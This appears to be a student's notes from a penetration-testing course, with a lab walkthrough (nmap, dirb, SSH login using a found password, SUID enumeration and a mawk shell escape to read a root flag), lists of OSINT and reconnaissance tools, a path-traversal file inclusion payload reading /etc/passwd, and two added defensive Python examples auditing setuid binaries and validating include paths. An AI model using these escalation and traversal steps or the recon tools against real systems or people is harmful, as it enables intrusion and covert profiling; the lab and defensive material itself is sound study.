22/tcp  open  ssh     syn-ack OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp  open  http    syn-ack Apache httpd 2.4.10 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Clean Blog - Start Bootstrap Theme
111/tcp open  rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          42287/udp  status
|_  100024  1          49362/tcp  status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Rocheston:~$ sudo dirb http://192.168.5.153

/admin = here we can find notes.txt, which contains a username and password.

sudo ssh ted@192.168.5.153

enter password - 12345ted123

Enumerate all binaries that have SUID permission

find / -perm -u=s -type f 2>/dev/null

Execute the following commands

mawk 'BEGIN {system("/bin/sh")}' to get the shell

id

cd /root

ls

cat flag.txt
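
Both escalation paths in these labs come down to a privileged binary that should not have been there: /bin/tar carrying cap_dac_read_search on the first box, and an unexpected setuid binary here. The script below is an added example, not part of the course notes or of any tool on the page. It parses the text that getcap -r / and find / -perm -4000 print and reports capabilities that amount to root for file access or identity, plus setuid binaries absent from an expected baseline. The sample outputs, the extra /usr/local/bin/mawk entry and the baseline set are constructed for the example.

```python
"""Audit file capabilities and setuid binaries against a baseline.

Added example (not part of the course notes, not from any tool on the page).
It parses the text printed by 'getcap -r / 2>/dev/null' and
'find / -perm -4000 -type f 2>/dev/null' and reports
  (a) capabilities that amount to root for file access or identity
      (cap_dac_read_search on /bin/tar is the case in the first box), and
  (b) setuid binaries missing from an expected baseline (the mawk case in Lab 6).
The sample outputs and the baseline below are constructed for the example.
"""
import re

# Capabilities that alone give arbitrary file read/write or identity change.
RISKY_CAPS = {
    "cap_dac_read_search", "cap_dac_override", "cap_setuid", "cap_setgid",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
    "cap_fowner",
}

# Constructed getcap output. Older libcap prints 'path = caps+flags',
# newer libcap prints 'path caps=flags'; both forms are handled.
SAMPLE_GETCAP = """\
/bin/tar = cap_dac_read_search+ep
/bin/ping = cap_net_raw+ep
/usr/bin/python3.7 cap_setuid=ep
"""

# Constructed 'find' output: part of the stock list from the first box plus one extra.
SAMPLE_SUID = """\
/bin/ping
/bin/mount
/bin/su
/bin/umount
/usr/bin/passwd
/usr/bin/newgrp
/usr/local/bin/mawk
"""

# Assumed baseline: the setuid binaries listed on the first box in the notes.
SUID_BASELINE = {
    "/bin/ping", "/bin/mount", "/bin/su", "/bin/umount",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/bin/newgrp",
    "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/gpasswd", "/usr/bin/passwd",
}

GETCAP_LINE = re.compile(r"^(\S+)\s+(?:=\s+)?(.+)$")
CAP_CLAUSE = re.compile(r"^([a-z0-9_,]+)[+=]([eip]+)$")


def parse_getcap(text):
    """Yield (path, capability, flags) triples from getcap -r output."""
    for line in text.splitlines():
        m = GETCAP_LINE.match(line.strip())
        if not m:
            continue
        path, capspec = m.groups()
        for clause in capspec.split():           # e.g. 'cap_chown,cap_fowner+ep'
            c = CAP_CLAUSE.match(clause)
            if not c:
                continue
            for cap in c.group(1).split(","):
                yield path, cap, c.group(2)


def risky_capabilities(getcap_text):
    """Return [(path, cap)] where a risky capability is permitted or effective."""
    return [(p, cap) for p, cap, flags in parse_getcap(getcap_text)
            if cap in RISKY_CAPS and ("e" in flags or "p" in flags)]


def unexpected_suid(find_text, baseline=SUID_BASELINE):
    """Return setuid paths from find output that are not in the baseline, sorted."""
    found = {ln.strip() for ln in find_text.splitlines() if ln.strip()}
    return sorted(found - set(baseline))


if __name__ == "__main__":
    for path, cap in risky_capabilities(SAMPLE_GETCAP):
        print(f"RISKY CAP  {path}: {cap}")
    for path in unexpected_suid(SAMPLE_SUID):
        print(f"NEW SETUID {path}")
```

Run on a host, feed it the real command output instead of the samples and keep the baseline in version control; a new entry in either list is what should trigger a look, because the file capability on tar was invisible to the usual setuid check.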

OSINT:

OSINT framework

Resources:

  • whois
  • checkusernames
  • haveibeenpwned
  • infospace

Usage

cd /rcce/whatweb/
runscript

./whatweb paultan.org
./whatweb juggybank.com

CVE to find Vulnerabilities

Tools learned:

/rcce/FinalRecon
runscript
cat finalrecon.py
python3.7 finalrecon.py --full http://juggybank.com
  • exporting to: /home/rocheston/.local/share/finalrecon/dumps/juggybank.com.txt

  • go to file manager, type in the directory

  • desktop>desktop1>file manager

  • /home/rocheston/.local/share/finalrecon/dumps
  • click juggybank.com.txt

9/9

Tools learned:

  • theHarvester

  • cd rcce/theHarvester
  • theHarvester.py

  • cat theHarvester.py
  • ./theHarvester.py -d petronas -b linkedin

  • shodan.io (paid search engine)

  • kamerka.io (good for US)

  • archive service

  • www.archive.org

  • creepy geolocation - geocreepy.com

  • identify geolocation based on photos

  • windows 7 in rose.
  • right click >run program > virtualbox

  • geocreepy.com on rose virtualbox, install 32bit version

  • open cree.py
  • new project name: locate SAJAT
  • keywords: sajat
  • description: hired by special branch to locate sajat

  • email trackers.
  • www.hubspot.com

  • gmail tracker

  • cyberscanner.net/gmail

  • in terminal, arp-scan --help

  • arp-scan 10.0.0.1-10.0.0.254

  • nmap -v -A www.juggybank.com

11/9

Tools learned:

Question in exam: password spraying

  • caldera

  • greynoise.io

  • https://www.shadowserver.org/

  • https://cybermap.kaspersky.com/

  • http://threatmap.checkpoint.com/

  • cd /usr/share/nmap/scripts/

  • git clone https://github.com/scipag/vulscan.git scipag_vulscan

  • ln -s "$(pwd)/scipag_vulscan" /usr/share/nmap/scripts/vulscan

13/9

Tools learned:

  • Cmseek tool web app module 4

  • python3 cmseek.py -u website

18/9

Topics:

Exam Question: Explain complexity of code.

  • file inclusion: localhost:2063/?page=../../../../../../etc/passwd or vnc.conf

  • haja.me/tools/cmd.txt

  • localhost:90/jsfuck

  • sqlmap
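
The file inclusion bullet above shows the request; the server-side check that defeats it is small. The function below is an added example, not from the notes or any tool on the page: it resolves the page parameter inside a fixed template directory, rejects anything that escapes that directory, looks like a URL or contains a NUL byte, and optionally restricts the request to an allowlist of file names. The base directory /srv/app/pages and the file names are assumed for the example.

```python
"""Safe resolution of a user-supplied 'page' parameter for an include.

Added example, not from the notes or any tool on the page. It is the
server-side check that stops '?page=../../../../../../etc/passwd': the value is
resolved inside a fixed template directory, anything that escapes it (or looks
like a URL, or contains a NUL byte) is rejected, and an optional allowlist
restricts which files may be included at all. Paths are assumed for the example.
"""
import re
from pathlib import Path

SCHEME = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*:")   # 'http:', 'file:' and similar


def resolve_page(page, base_dir, allowed=None):
    """Return the resolved Path to include, or None if the request is unsafe."""
    if not page or "\x00" in page:
        return None                      # empty or NUL-truncated names
    if SCHEME.match(page) or page.startswith(("/", "\\")):
        return None                      # remote includes and absolute paths
    base = Path(base_dir).resolve()
    candidate = (base / page).resolve()  # collapses '..' and follows symlinks
    try:
        candidate.relative_to(base)      # must still be inside base_dir
    except ValueError:
        return None
    if candidate == base:
        return None                      # 'page=.' would name the directory itself
    if allowed is not None and candidate.name not in allowed:
        return None
    return candidate


if __name__ == "__main__":
    base = "/srv/app/pages"              # assumed template directory
    for req in ("about.php", "../../../../../../etc/passwd", "/etc/passwd"):
        print(f"{req!r:40} -> {resolve_page(req, base)}")
```

The allowlist is the stronger of the two controls: with it, the traversal check only has to catch mistakes in the list, and a request for a file the application never meant to include fails even when it is inside the directory.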

Updated: